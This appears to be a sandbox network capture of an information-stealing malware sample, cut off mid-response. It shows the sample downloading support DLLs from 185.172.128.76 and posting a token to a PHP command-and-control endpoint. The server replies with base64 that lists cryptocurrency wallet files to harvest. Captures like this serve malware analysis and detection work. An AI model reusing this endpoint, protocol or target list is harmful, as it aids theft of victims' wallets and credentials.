                                                                                                                                                                                                                                            Apr 23, 2024 09:43:22.517607927 CEST94OUTGET /15f649199f40275b/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:22.825726032 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:22 GMT
                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                            Content-Length: 450024
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                            ETag: "6dde8-5e7e950876500"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:25.216989994 CEST90OUTGET /15f649199f40275b/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:25.525017977 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:25 GMT
                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                            Content-Length: 2046288
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                            ETag: "1f3950-5e7e950876500"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:26.902467966 CEST94OUTGET /15f649199f40275b/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:27.213639021 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:27 GMT
                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                            Content-Length: 257872
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                            ETag: "3ef50-5e7e950876500"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:27.492023945 CEST98OUTGET /15f649199f40275b/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:27.797914028 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:27 GMT
                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                            Content-Length: 80880
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                            ETag: "13bf0-5e7e950876500"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:28.926028967 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----EHJKJDGCGDAKFHIDBGCB
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1067
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:29.254934072 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:29 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:29.342494011 CEST468OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAEC
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 267
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 2d 2d 0d 0a
                                                                                                                                                                                                                                            Data Ascii: ------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="message"wallets------HJJKFBGCFHCGDHIDAAEC--
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:29.653361082 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:29 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 2408
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 58 45 64 79 5a 57 56 75 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 78 66 46 64 68 63 32 46 69 61 53 42 58 59 57 78 73 5a 58 52 38 4d 58 78 63 56 32 46 73 62 47 56 30 56 32 46 7a 59 57 4a 70 58 45 4e 73 61 57 56 75 64 46 78 58 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 6d 70 7a 62 32 35 38 4d 48 78 46 64 47 68 6c 63 6d 56 31 62 58 77 78 66 46 78 46 64 47 68 6c 63 6d 56 31 62 56 78 38 61 32 56 35 63 33 52 76 63 6d 56 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 58 77 78 66 46 78 46 62 47 56 6a 64 48 4a 31 62 56 78 33 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 69 70 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 55 78 55 51 33 77 78 66 46 78 46 62 47 56 6a 64 48 4a 31 62 53 31 4d 56 45 4e 63 64 32 46 73 62 47 56 30 63 31 78 38 4b 69 34 71 66 44 42 38 52 58 68 76 5a 48 56 7a 66 44 46 38 58 45 56 34 62 32 52 31 63 31 78 38 5a 58 68 76 5a 48 56 7a 4c 6d 4e 76 62 6d 59 75 61 6e 4e 76 62 6e 77 77 66 45 56 34 62 32 52 31 63 33 77 78 66 46 78 46 65 47 39 6b 64 58 4e 63 66 48 64 70 62 6d 52 76 64 79 31 7a 64 47 46 30 5a 53 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 58 47 56 34 62 32 52 31 63 79 35 33 59 57 78 73 5a 58 52 38 4d 58 78 63 52 58 68 76 5a 48 56 7a 58 47 56 34 62 32 52 31 63 79 35 33 59 57 78 73 5a 58 52 63 66 48 42 68 63 33 4e 77 61 48 4a 68 63 32 55 75 61 6e 4e 76 62 6e 77 77 66 45 56 34 62 32 52 31 63 31 78 6c 65 47 39 6b 64 58 4d 75 64 32 46 73 62 47 56 30 66 44 46 38 58 45 56 34 62 32 52 31 63 31 78 6c 65 47 39 6b 64 58 4d 75 64 32 46 73 62 47 56 30 58 48 78 7a 5a 57 56 6b 4c 6e 4e 6c 59 32 39 38 4d 48 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 48 77 78 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 61 57 35 6d 62 79 35 7a 5a 57 4e 76 66 44 42 38 52 57 78 6c 59 33 52 79 62 32 34 67 51 32 46 7a 61 48 77 78 66 46 78 46 62 47 56 6a 64 48 4a 76 62 6b 4e 68 63 32 68 63 64 32 46 73 62 47 56 30 63 31 78 38 4b 69 34 71 66 44 42 38 54 58 56 73 64 47 6c 45 62 32 64 6c 66 44 46 38 58 45 31 31 62 48 52 70 52 47 39 6e 5a 56 78 38 62 58 56 73 64 47 6c 6b 62 32 64 6c 4c 6e 64 68 62 47 78 6c 64 48 77 77 66 45 70 68 65 48 67 67 52 47 56 7a 61 33 52 76 63 43 41 6f 62 32 78 6b 4b 58 77 78 66 46 78 71 59 58 68 34 58 45 78 76 59 32 46 73 49
